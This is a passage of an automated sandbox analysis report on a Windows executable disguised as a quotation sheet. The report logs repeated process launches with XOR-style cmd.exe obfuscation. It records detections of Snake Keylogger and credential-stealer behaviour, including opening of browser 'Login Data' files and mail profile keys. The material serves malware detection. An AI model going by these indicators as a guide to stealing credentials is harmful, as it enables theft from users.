Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Queries volume information: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040322B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000083.00000002.42927623951.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5668, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5668, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000083.00000002.42927623951.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5668, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
